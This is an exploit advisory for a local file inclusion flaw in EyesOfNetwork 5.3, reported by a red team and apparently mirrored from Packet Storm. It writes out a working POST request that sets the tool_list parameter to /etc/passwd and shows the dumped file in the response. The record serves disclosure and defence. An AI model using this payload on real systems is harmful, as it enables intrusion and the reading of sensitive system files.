EyesOfNetwork 5.3 Local File Inclusion

🗓️ 11 Jan 2021 00:00:00Reported by Audencia Business School Red TeamType

packetstorm🔗 packetstormsecurity.com👁 359 Views

EyesOfNetwork 5.3 Local File Inclusion vulnerabilit

`# Exploit Title: EyesOfNetwork 5.3 - LFI  
# Date: 10/01/2021  
# Exploit Author: Audencia Business SCHOOL Red Team  
# Vendor Homepage: https://www.eyesofnetwork.com/en  
# Software Link: http://download.eyesofnetwork.com/EyesOfNetwork-5.3-x86_64-bin.iso  
# Version: 5.3  
  
The php not exclude other tools than proposed one. It's possible possible to include files when the parameter "tool_list=" is modified like that :  
  
==================================================================  
POST /module/tool_all/select_tool.php HTTP/1.1  
Host: 192.168.0.26  
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0  
Accept: */*  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Content-Type: application/x-www-form-urlencoded; charset=UTF-8  
X-Requested-With: XMLHttpRequest  
Content-Length: 209  
Origin: https://192.168.0.26  
Connection: close  
Referer: https://192.168.0.26/module/tool_all/  
Cookie: session_id=746751013; user_name=admin; user_id=1; user_limitation=0; group_id=1  
  
(tool_list=FILE TO READ)  
page=bylistbox&host_list=127.0.0.1&tool_list=/etc/passwd&snmp_com=aze&snmp_version=2c&min_port=1&max_port=1024&username=&password=&snmp_auth_protocol=MD5&snmp_priv_passphrase=&snmp_priv_protocol=&snmp_context=  
  
==================================================================  
  
  
Result a printed /etc/passwd document in the webpage :   
  
==================================================================  
  
HTTP/1.1 200 OK   
Date: Sat, 09 Jan 2021 01:16:21 GMT   
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16 mod_perl/2.0.11 Perl/v5.16.3   
X-Powered-By: PHP/5.4.16   
Content-Length: 1529   
Connection: close   
Content-Type: text/html; charset=UTF-8   
  
root:x:0:0:root:/root:/bin/bash  
bin:x:1:1:bin:/bin:/sbin/nologin  
daemon:x:2:2:daemon:/sbin:/sbin/nologin  
adm:x:3:4:adm:/var/adm:/sbin/nologin  
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin  
sync:x:5:0:sync:/sbin:/bin/sync  
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown  
halt:x:7:0:halt:/sbin:/sbin/halt  
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin  
operator:x:11:0:operator:/root:/sbin/nologin  
games:x:12:100:games:/usr/games:/sbin/nologin  
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin  
nobody:x:99:99:Nobody:/:/sbin/nologin  
nagios:x:999:991::/var/spool/nagios:/sbin/nologin  
influxdb:x:998:998::/var/lib/influxdb:/bin/false  
systemd-network:x:192:192:systemd Network Management:/:/sbin/nologin  
dbus:x:81:81:System message bus:/:/sbin/nologin  
apache:x:48:48:Apache:/usr/share/httpd:/sbin/nologin  
mysql:x:27:27:MariaDB Server:/var/lib/mysql:/sbin/nologin  
grafana:x:997:995:grafana user:/usr/share/grafana:/sbin/nologin  
polkitd:x:996:994:User for polkitd:/:/sbin/nologin  
ntp:x:38:38::/etc/ntp:/sbin/nologin  
snmptt:x:995:992:SNMP Trap Translator:/var/spool/snmptt:/sbin/nologin  
rpc:x:32:32:Rpcbind Daemon:/var/lib/rpcbind:/sbin/nologin  
postfix:x:89:89::/var/spool/postfix:/sbin/nologin  
chrony:x:994:990::/var/lib/chrony:/sbin/nologin  
tss:x:59:59:Account used by the trousers package to sandbox the tcsd daemon:/dev/null:/sbin/nologin  
cacti:x:1000:991::/home/cacti:/bin/bash  
eon4apps:x:1001:991::/srv/eyesofnetwork/eon4apps:/bin/bash  
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin  
admin:x:1002:1000:admin:/home/admin:/bin/bash  
  
==================================================================  
`

11 Jan 2021 00:00Current

7.4High risk

Vulners AI Score7.4